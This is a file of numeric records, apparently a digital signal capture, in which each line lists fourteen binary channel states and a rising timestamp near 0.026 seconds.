1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992684e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992708e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992732e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992756e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992780e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992804e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992832e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992856e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992884e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992908e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992932e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5992956e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5992980e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5993004e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5993032e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5993056e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5993084e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5993108e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5993132e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5993156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5993184e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5993212e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5993236e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.5993260e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.5993284e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,1,2.6117816e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,2.6118036e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6118060e-02 0,1,1,0,1,0,0,0,0,0,0,1,0,1,2.6118084e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6118108e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,2.6118400e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6118424e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,2.6118452e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6118476e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,2.6118500e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6118524e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,2.6118548e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6118572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,2.6118600e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6118620e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6118648e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6118652e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6118676e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6118696e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6118724e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6118748e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6118772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6118796e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6118820e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6118844e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6118876e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6118900e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6118924e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6118948e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6118972e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6118996e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119020e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119044e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119072e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119096e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119124e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119148e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119196e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119220e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119244e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119272e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119296e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119324e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119348e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119372e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119396e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119420e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119444e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119472e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119496e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119520e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119548e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119596e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119620e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119644e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119672e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119692e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119720e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119744e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119796e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119820e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119844e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119872e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119892e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119920e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119944e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6119972e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6119996e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120020e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120044e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120072e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120092e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120120e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120144e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120196e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120220e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120244e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120272e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120292e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120320e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120344e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120372e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120396e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120420e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120444e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120468e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120492e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120520e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120544e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120596e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120620e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120644e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120668e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120692e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120720e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120744e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6120796e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6120820e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6120824e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6120844e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6120868e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6120892e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6120920e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6120944e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6120972e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6120996e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6121020e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6121044e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6121072e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6121092e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6121120e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121124e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121144e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121196e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121220e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121244e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121272e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121292e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121320e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121348e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121372e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121396e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121420e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121444e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121472e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121496e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121524e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121548e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121596e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121620e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121644e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121672e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121696e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121724e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121748e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121796e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121820e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121844e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121872e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121896e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121924e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121948e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6121972e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6121996e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122020e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122044e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122072e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122096e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122124e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122148e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122196e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122220e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6122228e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6122244e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6122272e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6122296e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6122320e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6122348e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6122372e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6122396e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6122420e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6122444e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6122472e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6122496e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6122520e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122528e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122548e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122596e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122620e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122644e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122672e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122696e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122720e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122748e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122796e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122820e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122844e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122872e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122892e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122920e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122948e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6122972e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6122996e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123020e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123044e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123072e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123092e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123120e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123144e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123196e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123220e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123244e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123272e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6123276e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6123292e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6123320e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6123344e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6123372e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6123396e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6123420e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6123444e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6123472e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6123492e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6123520e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.6123544e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.6123572e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123576e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123596e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123620e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123644e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123672e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123692e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123720e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123744e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123772e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123796e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123820e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123844e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123872e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123892e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123920e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123944e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6123972e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6123996e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124020e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124044e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124072e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124092e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124120e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124148e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124172e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124196e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124220e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124244e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124272e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124292e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124320e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124348e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124372e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124396e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124420e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124444e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124472e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124492e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124520e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124548e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124572e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124596e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124620e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124668e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124692e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124716e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124740e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6124764e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6124792e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6249720e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6249928e-02 1,1,1,0,1,0,0,0,0,0,0,1,0,1,2.6249948e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6249972e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.6250252e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6250276e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.6250300e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6250328e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.6250352e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6250380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.6250404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6250428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.6250452e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6250476e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.6250500e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6250528e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.6250552e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6250556e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6250580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6250604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6250628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6250652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6250676e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6250700e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6250728e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6250752e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6250780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6250804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6250828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6250852e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6250876e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6250900e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6250928e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6250952e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6250980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251052e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251076e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251100e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251128e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251152e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251252e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251276e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251300e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251328e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251352e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251452e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251476e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251500e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251528e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251580e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251700e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251728e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251780e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251852e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251876e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6251928e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6251952e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252128e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252152e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252176e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252228e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252324e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252352e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252552e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252676e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252700e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252724e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252748e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252772e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252800e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252824e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252852e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252876e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252900e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252924e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6252948e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6252972e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253000e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253024e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253052e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253076e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253124e-02 